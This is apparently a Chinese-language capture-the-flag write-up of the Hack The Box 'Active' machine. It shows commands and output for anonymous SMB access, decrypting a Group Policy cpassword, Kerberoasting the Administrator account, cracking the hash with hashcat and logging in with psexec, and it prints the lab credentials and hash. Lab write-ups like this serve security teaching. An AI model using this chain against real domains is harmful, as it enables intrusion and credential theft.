HTB-Active靶机
信息搜集
nmap
sudo nmap --min-rate 10000 -p- -oA nmapscan/ports 10.129.1.72 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 14:54 CST
Warning: 10.129.1.72 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.1.72
Host is up (0.52s latency).
Not shown: 44639 closed tcp ports (reset), 20874 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49171/tcp open unknown
49173/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 70.49 seconds
smb-445
$ smbclient -L //10.129.1.51/ -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
逐一尝试,只有 Replication 可匿名访问,下载整个 Replication 文件到本地进行分析。
查看文件结构:
$ tree
.
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
22 directories, 7 files
这个目录结构是 Windows 域控上的 SYSVOL 共享,稍后访问 SYSVOL 时可以看到其内容和此文件内容一致。
SVC_TGS
Groups.xml
Policies 文件夹里面存放的是组策略对象 (GPO) 的具体设置。
DFS Replication的作用是同步。在一个域中有多个域控(DC)时,DFSR 负责确保 A 域控上修改的 Policies 内容能自动复制到 B 域控上。 微软的描述:“DFS Replication 使您能够高效地跨多个服务器和站点复制文件夹(包括 DFS namespace 路径引用的文件夹)。 DFS Replication 使用一种称为远程差分压缩 (RDC) 的压缩算法。RDC 可以检测文件中的数据更改,并使 DFS Replication 仅复制已更改的文件块,而不是整个文件。”
经过搜索,值得我们关注的是 Groups.xml 。在旧版本的 Windows Server 中,管理员可以通过组策略批量给所有工作站设置本地管理员密码。这个密码会被加密后存储在 Groups.xml 的 cpassword 属性中。微软在 2012 年公开了加密这个密码的 AES 密钥。这意味着任何人只要能读取这个 XML 文件(通常域内普通用户都有读取权限),就能解密出里面的明文密码。
查看 Groups.xml,确实有 cpassword 字段,这给了我信心:
$ cat Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
现在只需要搜索相关的解密脚本。gpp-decrypt看起来不错!我们使用 -c 参数指定密码字符串。
$ python3 gpp-decrypt.py -c "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
/home/meraki/notes/HTB/Active/gpp-decrypt/gpp-decrypt.py:13: SyntaxWarning: invalid escape sequence '\ '
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ * ] Password: GPPstillStandingStrong2k18
现在拿到了一组凭据:active.htb\SVC_TGS:GPPstillStandingStrong2k18
user.txt
用这组凭据再次访问 smb,在 SYSVOL 下就有前面的 active.htb 文件夹:
$ smbclient //10.129.1.72/SYSVOL -U "SVC_TGS"
Password for [WORKGROUP\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 19 02:48:57 2018
.. D 0 Thu Jul 19 02:48:57 2018
active.htb Dr 0 Thu Jul 19 02:48:57 2018
Users也可以访问,看样子就是目标机器上的 Users 文件夹:
$ smbclient //10.129.1.72/Users -U "SVC_TGS"
Password for [WORKGROUP\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 22:39:20 2018
.. DR 0 Sat Jul 21 22:39:20 2018
Administrator D 0 Mon Jul 16 18:14:21 2018
All Users DHSrn 0 Tue Jul 14 13:06:44 2009
Default DHR 0 Tue Jul 14 14:38:21 2009
Default User DHSrn 0 Tue Jul 14 13:06:44 2009
desktop.ini AHS 174 Tue Jul 14 12:57:55 2009
Public DR 0 Tue Jul 14 12:57:55 2009
SVC_TGS D 0 Sat Jul 21 23:16:32 2018
10459647 blocks of size 4096. 5202233 blocks available
在 SVC_TGS\Desktop 中找到了 user.txt:
$ smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 23:14:42 2018
.. D 0 Sat Jul 21 23:14:42 2018
user.txt AR 34 Sat Jan 10 02:02:30 2026
下载到本地然后读取即可。
Administrator
Kerberoasting
目标机器 88 端口开放,现在也获得了域用户的凭据,可以尝试 Kerberoasting 攻击。Kerberoasting 就是通过破解 TGS 票据,直接获取设置了 SPN 的账号的明文密码。
$ GetUserSPNs.py -dc-ip 10.129.1.72 active.htb/SVC_TGS -request
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 03:06:40.351723 2026-01-10 02:02:34.244143
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$190729e5bb45c13b2e409cfdc9675ab9$697d00e81af926401d9f8ece83cd73ca5d4933739c09b0e98e2d05723f1f29a70a9d969394922e58eea134339b9aabd3fbf2278231bd7b98cb4281e9edfa950865e4eace4abff43e6c5bd0addee0a2cee340b1b3ef893127e23ae45cdf54147e2d5ef22736071f113c67dfcc6a458c3f10c53c2fa77bfc0d7e43143c4fc3a76357d05834181330ed8450003e4c683854ac7811a5870f37fa03f7d1bb3f1768215f19c263b637678caf9b29ca0aec134b7cf8c0028f588ff1afcce8bd746891c10831dee40b209eed0aba5224c526a6faa65683df4c589c39d060b7e2e042b8c72939a5d9d9a1c20e20e8cce339b64f38bada3155d2a8d5c91ef45db55de1e76f29018141523b586943bf1e6ca97452f66c69f3704470ec7d860ee6d7026e392f0198c7e5c99a51478b3c54bb7ef948ebfb769a31ffe61aef3778f48996893d7b9d316b06dcf774b4e67d426f4b38db74b722fd3f4698337e5bb881c941dcace33133879d5e7525624d96ec6a587d96626a0b431dc9d01013a6cb05e479d0cdeb591a4367e0a9657e5cbe7b88440fb55e15130209519857a9d8069a70126a59058c1d51f8d2d09253b525bdc94aaa5ba609c07ad1d5cc284025b3ca9128945c97929282e3ad945077402e7a6c5aec0fac7f4ba7a77356acff574a56ff59ccd1298d95a9410288d4e9279743c0e4df2d698e8b95ef293a77fa1a3f7ee219f895be0ebbf994424249e67ebdef6d7be021bfe66b1d571d0a4aa562a631d9cd196000e238b6bbb3a3ac4ab0f74af77f1c6cc89e988b51cfec964c1b483dc015531595ae9716e8aa827794fa49444324aaea5d4bc7794ca4c032397254e52b51fd87be75c041d4a7120fdbaf1972f93cc80d121519dbcbe4a2cd7e34a56f679c27c98a5c13e235a0444637694331c6c580ddf0878cd4ecb21875c8444c8da0703a8608d3b24ec76118d9856f7de7630947f4eda0930fd1b1f3a84c09ca00c6bedba5e7c9c3769cdb61b7b08cde7e1e6d055d5c1be6a283180a3e863952980a6c5546f976bd62eac780dbc8988594fe8a702e579c4799890662328d0f43474cd3877cf1630e935f780f7a9e0bec604ce24eb16a829ebff16ca96a36755656c4b431d86215a9b107e5e1c607f5dcff5692d64d7432e42ca82e0fb9068a1ebc6d0fb25df36a49210500e8b2c4ce41fdc5d4ea63b4ea84fb5d6dee53fd8a8ccef7346fe458f5e614e22038fcf7974dfa626f22fa4270c3eaa8db931a715aac
恰好 Administrator 就设置了 SPN ,直接进行解码:
$ hashcat -m 13100 admin.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
...[省略]...
...[省略]...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$190729e5bb45c13b2e409cfdc9675ab9$697d00e81af926401d9f8ece83cd73ca5d4933739c09b0e98e2d05723f1f29a70a9d969394922e58eea134339b9aabd3fbf2278231bd7b98cb4281e9edfa950865e4eace4abff43e6c5bd0addee0a2cee340b1b3ef893127e23ae45cdf54147e2d5ef22736071f113c67dfcc6a458c3f10c53c2fa77bfc0d7e43143c4fc3a76357d05834181330ed8450003e4c683854ac7811a5870f37fa03f7d1bb3f1768215f19c263b637678caf9b29ca0aec134b7cf8c0028f588ff1afcce8bd746891c10831dee40b209eed0aba5224c526a6faa65683df4c589c39d060b7e2e042b8c72939a5d9d9a1c20e20e8cce339b64f38bada3155d2a8d5c91ef45db55de1e76f29018141523b586943bf1e6ca97452f66c69f3704470ec7d860ee6d7026e392f0198c7e5c99a51478b3c54bb7ef948ebfb769a31ffe61aef3778f48996893d7b9d316b06dcf774b4e67d426f4b38db74b722fd3f4698337e5bb881c941dcace33133879d5e7525624d96ec6a587d96626a0b431dc9d01013a6cb05e479d0cdeb591a4367e0a9657e5cbe7b88440fb55e15130209519857a9d8069a70126a59058c1d51f8d2d09253b525bdc94aaa5ba609c07ad1d5cc284025b3ca9128945c97929282e3ad945077402e7a6c5aec0fac7f4ba7a77356acff574a56ff59ccd1298d95a9410288d4e9279743c0e4df2d698e8b95ef293a77fa1a3f7ee219f895be0ebbf994424249e67ebdef6d7be021bfe66b1d571d0a4aa562a631d9cd196000e238b6bbb3a3ac4ab0f74af77f1c6cc89e988b51cfec964c1b483dc015531595ae9716e8aa827794fa49444324aaea5d4bc7794ca4c032397254e52b51fd87be75c041d4a7120fdbaf1972f93cc80d121519dbcbe4a2cd7e34a56f679c27c98a5c13e235a0444637694331c6c580ddf0878cd4ecb21875c8444c8da0703a8608d3b24ec76118d9856f7de7630947f4eda0930fd1b1f3a84c09ca00c6bedba5e7c9c3769cdb61b7b08cde7e1e6d055d5c1be6a283180a3e863952980a6c5546f976bd62eac780dbc8988594fe8a702e579c4799890662328d0f43474cd3877cf1630e935f780f7a9e0bec604ce24eb16a829ebff16ca96a36755656c4b431d86215a9b107e5e1c607f5dcff5692d64d7432e42ca82e0fb9068a1ebc6d0fb25df36a49210500e8b2c4ce41fdc5d4ea63b4ea84fb5d6dee53fd8a8ccef7346fe458f5e614e22038fcf7974dfa626f22fa4270c3eaa8db931a715aac:Ticketmaster1968
Administrator:Ticketmaster1968
root.txt
使用 psexec.py 直接登录:
$ psexec.py administrator@10.129.1.72
Administrator\Desktop 下就有 root.txt :
C:\Users\Administrator\Desktop> type root.txt
97e464861...[省略]...
浙公网安备 33010602011771号